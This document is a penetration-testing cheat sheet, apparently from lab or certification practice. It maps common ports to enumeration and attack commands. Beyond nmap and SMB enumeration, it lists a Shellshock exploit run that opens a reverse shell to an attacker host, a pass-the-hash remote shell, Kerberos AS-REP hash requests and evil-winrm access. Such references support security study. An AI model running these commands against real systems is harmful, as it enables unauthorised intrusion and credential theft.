COMMON PORTS AND USES
PORTS / ASSOCIATED COMMANDS / TARGET PROTOCOL
| Port | Target protocol | Commands |
|---|---|---|
| 21 | FTP | Try anonymous logins<br>`ftp [email protected]` |
| 25 | SMTP | `telnet 10.10.10.10 25`<br>`VRFY user`<br>FINISH SESSION: Ctrl + ] / close<br>VULN SHELLSHOCK – need valid email address:<br>`python2 postfix-shellshock-nc.py 10.10.10.10 [email protected] LHOST LPORT` |
| 110 | POP | |
| 143 | IMAP | |
| 587 | SECURE EMAIL | |
| 80 / 443 | WEB | Dirb / Dirbuster / Gobuster / Nikto / Curl<br>RFI / LFI / SQLI |
| 88 / 464 | KERBEROS | `pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe` |
| 111 | NFS | `showmount -a` / `showmount -e` |
| 135 | RPC | `impacket-rpcdump` |
| 139 / 445 | SMB | `nmap --script nbstat.nse <ip>`<br>`nmap --script smb-os-discovery <ip>`<br>`nmap --script smb-enum-shares -p139,445 <ip>`<br>`nmap --script smb-vuln* <ip>`<br>'net' command on Kali<br>`crackmapexec smb -u -p`<br>`rpcclient -U '' -N`<br>`impacket-lookupsid`<br>`enum4linux`<br>VERSIONS FOR ANALYSIS:<br>CIFS (OLD WINDOWS NT 4.0)<br>SMB 1.0 / SMB1 – WIN2K / WINXP / WIN SRV 2003 / WIN SRV 2003 R2<br>SMB 2.0 / SMB2 – WIN VISTA / WIN SRV 2008<br>SMB 2.1 / SMB2.1 – WIN 7 / WIN SRV 2008 R2<br>SMB 3.0 / SMB3 – WIN 8 / WIN SRV 2012<br>SMB 3.02 / SMB3 – WIN 8.1 / WIN SRV 2012 R2<br>SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) – WIN SRV 2016 / WIN 10 |
| 1433 | MSSQL | `nmap --script ms-sql* -p1433`<br>`sqsh -S 10.11.1.31 -U sa` |
| 3306 | MYSQL | `mysql -u <user> -p<pass>`<br>`show databases;`<br>`show tables;` |
| 389 / 3268 | LDAP | `nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse`<br>`nmap -p 389 --script ldap-search <ip>`<br>`dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220`<br>`impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request` |
| 3389 | RDP | `rdesktop -u <user> -p <pass> <host>` |
| 5985 / 5986 | WINRM | `evil-winrm -u <user> -p <pass> -i <host>` |